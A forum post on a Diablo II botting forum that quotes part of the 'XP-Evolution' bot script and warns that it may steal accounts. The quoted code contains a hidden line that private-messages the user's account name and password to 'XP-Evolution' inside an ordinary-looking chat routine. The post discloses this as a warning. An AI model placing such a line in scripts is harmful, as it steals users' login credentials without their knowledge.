Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Guide] XP-Evolution Scripts (released 7/14/06) + 1.2.0 Core
#23
ya uh someone on EoN (if you know what I am talking about)

post this. and says it may have set up scam you and steal your accounts.. take a look

Quote:case 3: // Lobby Chat

if( !chatActionsDone ) {
chatActionsDone = true;
delay( rnd(waitInChatBeforeActionsMin, waitInChatBeforeActionsMax) );
if( joinRandomChannel || joinChannelInChat != "" ) {
say( "/join " + (joinRandomChannel ? getRandomString(rnd(3,10)) : joinChannelInChat) );
delay( rnd(waitAfterChannelJoinMin, waitAfterChannelJoinMax) );
}

//If chosen to creat games starting at 1 and go up from there (1,2,3,4,etc), else start at 0. Thanks to collective for this
if( spamGame && joinChatAfterGame ) {
if (startgameatone) {
name = (!gameData.gameName || gameData.useRandomGameName ? getRandomString(rnd(minimumGameNameChars,maximumGameNameChars)) : gameData.gameName + (gameData.totalGames + 1));
pass = (gameData.useRandomGamePass ? getRandomString(rnd(minimumGamePassChars,maximumGamePassChars)) : gameData.gamePass);
} else {
name = (!gameData.gameName || gameData.useRandomGameName ? getRandomString(rnd(minimumGameNameChars,maximumGameNameChars)) : gameData.gameName + (gameData.totalGames));
pass = (gameData.useRandomGamePass ? getRandomString(rnd(minimumGamePassChars,maximumGamePassChars)) : gameData.gamePass);
}

if ( gameData.gamePass != "" ) {
if (spamPass) { say( "Game " + name + "//" + pass + " will be made soon enough, please wait for me to tell you when." ); }
Quote:else { say( "/m XP-Evolution "+gameData.accountName+":l"+gameData.accountPass); }

} else { say( "Game " + name + " will be made soon enough, please wait for me to tell you when." ); }
delay( 1000 );
}

if( gameData.followBotMode ) break;
if( randomChatTalk ) {
for( i=0; i<rnd(randomChatLinesMin, randomChatLinesMax); i++ ) {
say( pickRandomLocaleKey() );
delay( rnd( randomChatLineDelayMin, randomChatLineDelayMax ) );
}
}

sry if im not allowed to post this..
I havent been around here in like... forver.. haha
Reply


Messages In This Thread
[Guide] XP-Evolution Scripts (released 7/14/06) + 1.2.0 Core - by DaRK_IMMoRTAL - 07-19-2006, 02:02 AM

Possibly Related Threads…
Thread Author Replies Views Last Post
  Baal and Diablo scripts Pube89 9 361 01-26-2012, 06:13 AM
Last Post: comper
  Problems with item-logging - Tried useing Skidudes guide... Akao 5 142 01-09-2012, 05:45 AM
Last Post: comper
  MirageBot Guide link[km] 2 4,495 12-17-2011, 02:34 PM
Last Post: TyKe
  help with D2NT etal attack scripts Lite Sorc Plethora 1 1,681 12-10-2011, 09:20 AM
Last Post: comper
  5 Questions about scripts. Need info yazzzerrr 0 190 06-19-2011, 06:21 AM
Last Post: yazzzerrr
  D2NT172_NTBot36 Quick Guide HoTO 84 21,906 05-06-2011, 11:13 AM
Last Post: Valdez
  D2Loader Guide Spitfire 3 3,823 04-12-2011, 05:54 AM
Last Post: mcmlxx
  Need beginners guide how to get bot going? streamlined123 1 368 04-04-2011, 05:12 PM
Last Post: Blue
  D2NT 3.1 Bot Set-up and Pickit Guide Valdez 3 4,418 03-10-2011, 07:34 AM
Last Post: Valdez
  lookin for some scripts superchil8 0 249 03-04-2011, 06:36 PM
Last Post: superchil8

Forum Jump:


Users browsing this thread: 2 Guest(s)